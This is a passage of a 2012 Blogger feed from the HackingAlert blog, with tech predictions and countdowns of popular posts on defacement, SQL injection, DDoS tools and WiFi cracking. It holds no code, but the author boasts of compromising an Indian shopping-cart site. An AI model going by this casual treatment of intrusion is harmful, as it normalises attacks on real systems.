For example, if you&#39;re sending a text message, dual-cores have the potential to effectively streamline the lower-power functions of the phone through one core, while reserving the other core for more power-intensive functions, like gaming or navigation.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;u&gt;Contributors of this technology&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://3.bp.blogspot.com/-HRqZnnpmDGU/TwdaNnuuBlI/AAAAAAAABB8/_dY-kQsqrqc/s1600/cont5.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;98&quot; src=&quot;http://3.bp.blogspot.com/-HRqZnnpmDGU/TwdaNnuuBlI/AAAAAAAABB8/_dY-kQsqrqc/s320/cont5.PNG&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;i&gt;&lt;u&gt;&lt;span style=&quot;color: cyan; font-size: large;&quot;&gt;Hyper Hybrid Cloud&lt;/span&gt;&lt;/u&gt;&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;This technology is currently the new taste of startups. We have seen a tremendous growth in cloud technology in the past 3 years. This year can be something new. There are lots of big cloud players available on the internet. The problem arises when the data from one cloud storage (e.g. Google) has to be transferred to another cloud storage (e.g. Amazon). This is really a major issue these days and companies are&amp;nbsp;battling over it. Probably a hybrid cloud can be a solution to this problem which can allow a seamless data transfer from one cloud to another.
It can be seen like a new internet within the internet.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;u&gt;&lt;i&gt;&lt;span style=&quot;color: cyan; font-size: large;&quot;&gt;IT Security&amp;nbsp;&lt;/span&gt;&lt;/i&gt;&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;&lt;b&gt;&lt;u&gt;&lt;i&gt;&lt;span style=&quot;color: cyan; font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/i&gt;&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://3.bp.blogspot.com/-i9cm8o97IWk/TwddAnoVbRI/AAAAAAAABCE/R0Qjgf2dPjs/s1600/sec.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;149&quot; src=&quot;http://3.bp.blogspot.com/-i9cm8o97IWk/TwddAnoVbRI/AAAAAAAABCE/R0Qjgf2dPjs/s200/sec.jpg&quot; width=&quot;200&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;It was&amp;nbsp;surprising&amp;nbsp;for me to see that no one talked about IT security when I asked for an article on technologies of 2012. Obviously security is nothing new. But I personally believe that IT security is going to be reborn in 2012. The reason is quite evident in 2011. The year 2011 has been the &quot;Year Of Hacks&quot; where almost every major online company was made a victim in some form or the other. CEOs will surely spend some serious money for IT security this year so we may see some big changes in this sector. Use of better authentication features, protocol updates, cloud security, on-demand security can be some of the rising sectors. I am really looking forward to seeing how the industry responds back to security in 2011 as you all know what disasters have happened in 2011. Let&#39;s see&amp;nbsp;whether&amp;nbsp;we have learnt some lessons or not.&lt;br /&gt;&lt;br /&gt;These are a few technologies to keep an eye on for this year. We have an entire year ahead&amp;nbsp;in-front&amp;nbsp;of us and it will surely bring lots of&amp;nbsp;surprises.
This sector changes almost every day. Nothing can really be predicted about success or failure. Lets see how this year shapes up in terms of technology growth. Share your suggestions and comments.&lt;br /&gt;&lt;br /&gt;DARKLORD!!&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;color: cyan; font-size: large;&quot;&gt;&lt;b&gt;&lt;i&gt;&lt;u&gt;&lt;br /&gt;&lt;/u&gt;&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackingalert.blogspot.com/feeds/8440642449543357091/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackingalert.blogspot.com/2012/01/technologies-that-will-heat-up-in-2012.html#comment-form' title='8 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7708828398385990720/posts/default/8440642449543357091'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7708828398385990720/posts/default/8440642449543357091'/><link rel='alternate' type='text/html' href='http://hackingalert.blogspot.com/2012/01/technologies-that-will-heat-up-in-2012.html' title='Technologies that will heat up in 2012'/><author><name>abhinav singh</name><uri>http://www.blogger.com/profile/03102629587741077690</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://2.bp.blogspot.com/_MMJcoBRgsn4/SemPx5VvY3I/AAAAAAAAAA4/VZyEY96SW6o/S220/abhinavbom.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/-D3_K5aeq9cM/TwdNAwgwsmI/AAAAAAAABAs/rD-r0jfB0m0/s72-c/tab.jpg" height="72" width="72"/><thr:total>8</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7708828398385990720.post-8600500936676967292</id><published>2012-01-01T01:08:00.000+05:30</published><updated>2012-01-01T01:08:57.058+05:30</updated><title type='text'>BlogRoll 2011 - Top 5 Articles of 2011 
on HackingAlert</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://4.bp.blogspot.com/-cjWJ6vIWFJY/Tv9kLMxRXSI/AAAAAAAABAk/xHkFXnKA5fU/s1600/favicon.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://4.bp.blogspot.com/-cjWJ6vIWFJY/Tv9kLMxRXSI/AAAAAAAABAk/xHkFXnKA5fU/s1600/favicon.PNG&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Hope you liked the first part of the blog roll.&lt;br /&gt;Here is the final release of the blog roll to close the year 2011. Continuing from the previous roll, here are the top 5 posts for the year 2011. Again I will thank all the readers for their support.&lt;br /&gt;&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-family: Times, &#39;Times New Roman&#39;, serif; font-size: large;&quot;&gt;&lt;a href=&quot;http://hackingalert.blogspot.com/2011/09/complete-guide-to-defacing-website.html&quot; target=&quot;_blank&quot;&gt;5. Complete guide to defacing a website - CookBook&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: Times, &#39;Times New Roman&#39;, serif; font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;This article created a revolution on HackingAlert. Special thanks to team innobuzz for providing the shell upload. The article&amp;nbsp;&lt;/span&gt;received&lt;span style=&quot;font-family: inherit;&quot;&gt;&amp;nbsp;a positive feedback and backed lots of page views. 
Views: 8000+ &lt;a href=&quot;http://hackingalert.blogspot.com/2011/09/complete-guide-to-defacing-website.html&quot; target=&quot;_blank&quot;&gt;Read the article&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-family: Times, &#39;Times New Roman&#39;, serif; font-size: large;&quot;&gt;&lt;a href=&quot;http://hackingalert.blogspot.com/2011/12/complete-guide-to-staying-anonymous-on.html&quot; target=&quot;_blank&quot;&gt;4. Complete guide to staying anonymous on the internet&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: Times, &#39;Times New Roman&#39;, serif; font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;Again this article hit the security people and learners strongly. Actually this post was an outcome of simple social engineering that we can think of while using internet. There is nothing too special about the technique in this article, yet it appeared as a complete alien tutorial. Views: 6000+ &lt;a href=&quot;http://hackingalert.blogspot.com/2011/12/complete-guide-to-staying-anonymous-on.html&quot; target=&quot;_blank&quot;&gt;Read the article&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-family: Times, &#39;Times New Roman&#39;, serif; font-size: large;&quot;&gt;&lt;a href=&quot;http://hackingalert.blogspot.com/2011/11/setting-up-your-own-pentestinghacking.html&quot; target=&quot;_blank&quot;&gt;3. Setting up your own penetration testing/Hacking network using a single machine&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: Times, &#39;Times New Roman&#39;, serif; font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;This article was the outcome of inspiration that I&amp;nbsp;&lt;/span&gt;received&lt;span style=&quot;font-family: inherit;&quot;&gt;&amp;nbsp;from Sachin Rashte sir and Vivek Ramachandran Sir. I dedicate this article to them. 
This article featured on SecurityXploded and StudentSphere Magazine.&lt;/span&gt;&lt;br /&gt;Views: 3000+ &lt;a href=&quot;http://hackingalert.blogspot.com/2011/11/setting-up-your-own-pentestinghacking.html&quot; target=&quot;_blank&quot;&gt;Read the article&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-family: Times, &#39;Times New Roman&#39;, serif; font-size: large;&quot;&gt;&lt;a href=&quot;http://hackingalert.blogspot.com/2011/10/basic-sql-injection-tutorial-readers.html&quot; target=&quot;_blank&quot;&gt;2. Basic SQL injection tutorial - Readers Choice&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: Times, &#39;Times New Roman&#39;, serif; font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;This article is probably the coolest articles as it had a contribution from one of the top hackers of antisec. The tricks and queries in this article are unique and it fell like an atom bomb on my readers. People were so obsessed by this article that they started testing it on my blog :-) . I have posted several articles on SQL injection but the uniqueness of this post made it stand out of the crowd. It is certainly one of the top pages in Google search. Views:9000+ &lt;a href=&quot;http://hackingalert.blogspot.com/2011/10/basic-sql-injection-tutorial-readers.html&quot; target=&quot;_blank&quot;&gt;Read the article&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-family: Times, &#39;Times New Roman&#39;, serif; font-size: large;&quot;&gt;&lt;a href=&quot;http://hackingalert.blogspot.com/2011/10/complete-guide-to-refref-dos-tool.html&quot; target=&quot;_blank&quot;&gt;1. Complete Guide to #refref DDOS tool&amp;nbsp;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;This article is&amp;nbsp;undoubtedly the number one for me. HackingAlert was the first blog to report about the launch of this tool and provided a tutorial over it. 
It soon got copied on many websites but thanks to google that it always kept me on top for search query &quot;#refref&quot; . This article is still a hot topic on the blog and attracts several visitors daily. The success of this article almost landed me through to the most talked about hactivist group, anonymous. I am happy I didnt join it. Views: 13000+&amp;nbsp; &lt;a href=&quot;http://hackingalert.blogspot.com/2011/10/complete-guide-to-refref-dos-tool.html&quot; target=&quot;_blank&quot;&gt;Read the article&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;This was a recap of 2011. Time to say good bye to this year. Hope 2012 brings out the best of HackingAlert to its readers. Wish you all a very happy and Hackful new year!!&lt;br /&gt;&lt;br /&gt;Darklord!!&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackingalert.blogspot.com/feeds/8600500936676967292/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackingalert.blogspot.com/2012/01/blogroll-2011-top-5-articles-of-2011-on.html#comment-form' title='8 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7708828398385990720/posts/default/8600500936676967292'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7708828398385990720/posts/default/8600500936676967292'/><link rel='alternate' type='text/html' href='http://hackingalert.blogspot.com/2012/01/blogroll-2011-top-5-articles-of-2011-on.html' title='BlogRoll 2011 - Top 5 Articles of 2011 on HackingAlert'/><author><name>abhinav singh</name><uri>http://www.blogger.com/profile/03102629587741077690</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://2.bp.blogspot.com/_MMJcoBRgsn4/SemPx5VvY3I/AAAAAAAAAA4/VZyEY96SW6o/S220/abhinavbom.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" 
url="http://4.bp.blogspot.com/-cjWJ6vIWFJY/Tv9kLMxRXSI/AAAAAAAABAk/xHkFXnKA5fU/s72-c/favicon.PNG" height="72" width="72"/><thr:total>8</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7708828398385990720.post-5927571261528316402</id><published>2011-12-31T15:36:00.000+05:30</published><updated>2011-12-31T16:04:52.314+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="technical article"/><category scheme="http://www.blogger.com/atom/ns#" term="technology news"/><title type='text'>BlogRoll 2011 - Most Popular Tutorials on HackingAlert</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://4.bp.blogspot.com/-W0vx2BMYwpM/Tv7b4PkYx3I/AAAAAAAABAY/t6WQD6VPWsU/s1600/favicon.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://4.bp.blogspot.com/-W0vx2BMYwpM/Tv7b4PkYx3I/AAAAAAAABAY/t6WQD6VPWsU/s1600/favicon.PNG&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Hello Friends. The end of 2011 is approaching. HackingAlert had lots of special memories. lots of tutorials and articles were posted. Some were disliked, some were appriciated and some became a Hit on Internet. This year, Hackingalert posted a total of 156 blog posts which counts to about 3 lakh page views for this year.&lt;br /&gt;&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;br /&gt;This yar has been excellient in terms of stats. Well we will talk about the stats later. Here I am presenting a blog roll of my previous posts of 2011. I have selected top 15 articles out of 150 odd articles. The selection was based on number of views, number of comments and my personal likeness as well :-) .&lt;br /&gt;In this blog roll I will list the bottom 10 articles out of 15. Then in the next roll I will post about the remaining top 5 articles. 
So let us remember and re-live the memories again. Here goes the countdown&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-family: Times, &#39;Times New Roman&#39;, serif; font-size: large;&quot;&gt;&lt;a href=&quot;http://hackingalert.blogspot.com/2011/03/how-to-hack-websiteweb-server-3-step.html&quot; target=&quot;_blank&quot;&gt;15. How to Hack a Website/Web server - 3 step guide&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;When I posted this article in March, I was completely new to defacements. But I soon caught up the speed. I never went on a defacement rampage but I did report some vulnerabilities in around 10 websites. Its a good startup tutorial. Views: 2000+ . &lt;a href=&quot;http://hackingalert.blogspot.com/2011/03/how-to-hack-websiteweb-server-3-step.html&quot; target=&quot;_blank&quot;&gt;Read the article.&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-family: Times, &#39;Times New Roman&#39;, serif; font-size: large;&quot;&gt;&lt;a href=&quot;http://hackingalert.blogspot.com/2011/06/two-biggest-truths-about-hacking.html&quot; target=&quot;_blank&quot;&gt;14. two Biggest truths about Hacking Gmail, Hotmail,Facebook, Yahoo etc.&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;To be true, I wrote this article out of&amp;nbsp;frustration. Every day I used to get lots of mails, FB messages, tweets regarding hacking accounts. There is a big misconception amongst people that any hacker can hack into these accounts. Views : 2500+ .&lt;a href=&quot;http://hackingalert.blogspot.com/2011/06/two-biggest-truths-about-hacking.html&quot; target=&quot;_blank&quot;&gt; read the article&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-family: Times, &#39;Times New Roman&#39;, serif; font-size: large;&quot;&gt;&lt;a href=&quot;http://hackingalert.blogspot.com/2011/10/dummies-guide-to-windows-firewall.html&quot; target=&quot;_blank&quot;&gt;13. 
Dummies Guide to Windows Firewall&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;This is one of the less read yet popular posts. The reason why it became popular was its uniqueness. It attracted some professional network admins who appreciated this post a lot. Yet it remained a less known post on HackingAlert. Views : 1000+. &amp;nbsp;&lt;a href=&quot;http://hackingalert.blogspot.com/2011/10/dummies-guide-to-windows-firewall.html&quot; target=&quot;_blank&quot;&gt;read the article&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;a href=&quot;http://hackingalert.blogspot.com/2011/07/intercepting-http-requestresponse-using.html&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;font-family: Times, &#39;Times New Roman&#39;, serif; font-size: large;&quot;&gt;12. Intercepting HTTP Request/Response using Webscarab to Hack Web applications&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;I came to know about intercepting HTTP requests as a potential technique while I was preparing for an Interview for one of the top infosec companies. The technique struck me and I went ahead to compromise one of the popular online shopping carts of India. Views: 2000+ .&lt;a href=&quot;http://hackingalert.blogspot.com/2011/07/intercepting-http-requestresponse-using.html&quot; target=&quot;_blank&quot;&gt;Read the article&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-family: Times, &#39;Times New Roman&#39;, serif; font-size: large;&quot;&gt;&lt;a href=&quot;http://hackingalert.blogspot.com/2011/10/how-to-crack-wifi-wep-password-in.html&quot; target=&quot;_blank&quot;&gt;11. How to crack Wifi WEP password in simple steps.&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;I don&#39;t take the credit for this post. I learnt it from tutorials and then posted it. The same tutorial is available on several websites but it is certainly one of the most viewed tutorials on HackingAlert. 
Google search on &quot;Hacking Wifi&quot; lists this tutorial amongst top 4 websites so it has&amp;nbsp;received&amp;nbsp;lots of hits. Views : 6000+ &lt;a href=&quot;http://hackingalert.blogspot.com/2011/10/how-to-crack-wifi-wep-password-in.html&quot; target=&quot;_blank&quot;&gt;Read the article.&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-family: Times, &#39;Times New Roman&#39;, serif; font-size: large;&quot;&gt;&lt;a href=&quot;http://hackingalert.blogspot.com/2011/08/difference-between-ddr2-and-ddr3-ram.html&quot; target=&quot;_blank&quot;&gt;10. Difference Between DDR2 and DDR3 RAM&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;This post has an interesting story. I upgraded my laptop from 2 GB RAM to 4 GB. My laptop had Win7 32 bit. When I went to system properties it said RAM=4 GB( 3 GB usable) . WHAT? 3 GB usable. where did the other 1 GB go? Dont know the answer? Click to read. Thanks to Google again. It lists as the top result when you search for Diffrence between RAMs. Views: 5000+ . &lt;a href=&quot;http://hackingalert.blogspot.com/2011/08/difference-between-ddr2-and-ddr3-ram.html&quot; target=&quot;_blank&quot;&gt;Read the article&amp;nbsp;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-family: Times, &#39;Times New Roman&#39;, serif; font-size: large;&quot;&gt;&lt;a href=&quot;http://hackingalert.blogspot.com/2011/09/great-browser-war-unleashed-2011.html&quot; target=&quot;_blank&quot;&gt;9. The Great Browser War Unleashed- 2011 edition&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Well I dont want to brag but here is the truth about this article. Last year I posted the 2010 browser war and it featured in 2 IT magazines. When I posted it this year in October, It featured &amp;nbsp;in 2 magazines, 5 online portals and numerous forums. Many readers recognize HackingAlert as a blog that ranks browsers exceptionally. 
I am still waiting for the day when browsers will pay me to get a higher rank in my article :-) .&lt;br /&gt;Views : 6000+ &lt;a href=&quot;http://hackingalert.blogspot.com/2011/09/great-browser-war-unleashed-2011.html&quot; target=&quot;_blank&quot;&gt;Read the article&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-family: Times, &#39;Times New Roman&#39;, serif; font-size: large;&quot;&gt;&lt;a href=&quot;http://hackingalert.blogspot.com/2011/07/basics-of-nic-mac-and-arp-complete.html&quot; target=&quot;_blank&quot;&gt;8. Basics of NIC MAC &amp;amp; ARP , Art of ARP spoofing/flooding&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;This article dates back to the time when I was preparing for a company interview. So in order to revise and strengthen my concepts of Networking, I wrote this post and I&amp;nbsp;received&amp;nbsp;quite some&amp;nbsp;appreciation&amp;nbsp;for it. The article was not a hit among common readers but it was an eye catcher for learners. Views:4000+ &lt;a href=&quot;http://hackingalert.blogspot.com/2011/07/basics-of-nic-mac-and-arp-complete.html&quot; target=&quot;_blank&quot;&gt;Read the article&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-family: Times, &#39;Times New Roman&#39;, serif; font-size: large;&quot;&gt;&lt;a href=&quot;http://hackingalert.blogspot.com/2011/10/understand-port-scanning-in-detail.html&quot; target=&quot;_blank&quot;&gt;7. Understanding port scanning in detail&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;This is again a post that came out of my random experiences. I was asked what the difference is between a SYN scan and a TCP scan. Damn, I had no answer. So I went ahead to do a detailed study on port scanning and here is the outcome of it :-) . 
Views: 5000+ &lt;a href=&quot;http://hackingalert.blogspot.com/2011/10/understand-port-scanning-in-detail.html&quot; target=&quot;_blank&quot;&gt;Read the article&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-family: Times, &#39;Times New Roman&#39;, serif; font-size: large;&quot;&gt;&lt;a href=&quot;http://hackingalert.blogspot.com/2011/09/practical-reverse-engineering-tutorial.html&quot; target=&quot;_blank&quot;&gt;6. Practical Reverse Engineering tutorial - Cracking Winrar&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;I wrote this post when I was on a rampage to learn about Computer architecture, assembly and reverse engineering? But why did I suddenly shift to Architecture and reverse engineering?? Yup, again I was put up a question, Mr. Abhinav What experience do you have in Reverse Engineering and Assembly?&lt;br /&gt;Views: 4000+ &lt;a href=&quot;http://hackingalert.blogspot.com/2011/09/practical-reverse-engineering-tutorial.html&quot; target=&quot;_blank&quot;&gt;Read the article&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;This is not just a blog roll. Its my learning curve. I never sat down to decide that yes I have to write on this topic today. I simply shared my learning experience with all my readers. And I am really happy that people&amp;nbsp;appreciated&amp;nbsp;me, supported me and gave suggestions.&lt;br /&gt;&lt;br /&gt;In the next blog roll I will post about my top 5 posts for this year. 
They are also the outcome of my hell experience with computer network security and hacking.&lt;br /&gt;&lt;br /&gt;Remember :&amp;nbsp;Knowledge&amp;nbsp;is power when it is shared.&lt;br /&gt;Happy new year 2012.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;DARKLORD!!&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackingalert.blogspot.com/feeds/5927571261528316402/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackingalert.blogspot.com/2011/12/blogroll-2011-most-popular-tutorials-on.html#comment-form' title='7 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7708828398385990720/posts/default/5927571261528316402'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7708828398385990720/posts/default/5927571261528316402'/><link rel='alternate' type='text/html' href='http://hackingalert.blogspot.com/2011/12/blogroll-2011-most-popular-tutorials-on.html' title='BlogRoll 2011 - Most Popular Tutorials on HackingAlert'/><author><name>abhinav singh</name><uri>http://www.blogger.com/profile/03102629587741077690</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://2.bp.blogspot.com/_MMJcoBRgsn4/SemPx5VvY3I/AAAAAAAAAA4/VZyEY96SW6o/S220/abhinavbom.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/-W0vx2BMYwpM/Tv7b4PkYx3I/AAAAAAAABAY/t6WQD6VPWsU/s72-c/favicon.PNG" height="72" width="72"/><thr:total>7</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7708828398385990720.post-1371864891833442645</id><published>2011-12-30T16:02:00.000+05:30</published><updated>2011-12-30T16:02:38.750+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="technical article"/><category scheme="http://www.blogger.com/atom/ns#" term="technology 
news"/><title type='text'>Contribute to HackingAlert : Submit An Article on Technologies that will heatup in 2012</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://3.bp.blogspot.com/-2CMesgMCtX4/Tv2NoNHdUNI/AAAAAAAABAM/yh6GdCqj1EM/s1600/driving.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;169&quot; src=&quot;http://3.bp.blogspot.com/-2CMesgMCtX4/Tv2NoNHdUNI/AAAAAAAABAM/yh6GdCqj1EM/s320/driving.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Hello friends. HackingAlert had a glorious 2011 and its full credit goes to you readers. Its your support and suggestions which has kept me going. Even with scarcity of time, I still had to push myself to write on the blog and I was able to make that extra push just because of the encouragement I got from you all.&lt;br /&gt;&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;br /&gt;I am thankful to all of you. So I have decided to post the first article of 2012 which is contributed by my readers.&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;Topic : Technologies that will heat up in 2012&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;I have picked up a simple and less technical article so that maximum people can contribute. You have to write an article on those technologies which you think can be &quot;THE TECH-NEX&quot; for 2012. 
You can search on the internet and do your own mini research to figure out what can be the best technologies for 2012.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Here are a few guidelines:&amp;nbsp;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;You dont have to give a complete technical description of the technology. Just describe the technology and the reason why it will grow strongly in 2012 (around 150 words per technology). Make sure you use your own words to describe the technology.&lt;br /&gt;&lt;br /&gt;You can submit maximum 5 technologies. Not more than that.&lt;br /&gt;&lt;br /&gt;Dont be gadget specific. Like &quot;iphone 5&quot;. What I mean is that iphone is a gadget, not a technology. Infact there is a new processor that will be&amp;nbsp;implemented&amp;nbsp;in iphone that can be a revolution in 2012( guess!!). So focus on the technology that any revolutionary gadget&amp;nbsp;implements.&lt;br /&gt;&lt;br /&gt;Make sure you choose those technologies which are relevant in the field of Computers and internet. ( dont choose a micro-biological tech ;-) )&lt;br /&gt;&lt;br /&gt;Here is a sample article for you which I wrote last year - &lt;a href=&quot;http://hackingalert.blogspot.com/2011/01/7-technologies-that-will-heat-up-2011.html&quot; target=&quot;_blank&quot;&gt;Technologies that will heat up in 2011&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Submit your entries before 2 January 2012. The article will be published on 4 Jan 2012.&lt;br /&gt;&lt;br /&gt;You can create a word document and submit your article at abhinavbom@gmail.com.&lt;br /&gt;At the end of the article mention your Name, Email address, URL(optional) and your photograph(optional). In case your technology is selected for the article then we will publish it along with your photograph.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Something for everyone:&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;All my readers are equally important for me. So this is not a competition. 
There can be chances that the same technology is submitted by many contributors.&lt;br /&gt;So I will publish the name and photograph(in case you have submitted photograph) of all those who have submitted that technology.&lt;br /&gt;&lt;br /&gt;In the final article I will choose around 7-8 technologies so you have all chances to star on HackingAlert :) .&lt;br /&gt;&lt;br /&gt;I will encourage all of you to make maximum participation in this small event and make it the&amp;nbsp;successful&amp;nbsp;start for the year 2012.&lt;br /&gt;No one&#39;s entries will be neglected. Anyone who contributes an article will be featured on the blog. So I want maximum people to participate.&lt;br /&gt;&lt;br /&gt;Wish you all HAPPY NEW YEAR......Good luck for the article.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;DARKLORD!!&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackingalert.blogspot.com/feeds/1371864891833442645/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackingalert.blogspot.com/2011/12/contribute-to-hackingalert-submit.html#comment-form' title='6 Comments'/><link rel='edit' type='application/atom+xml' 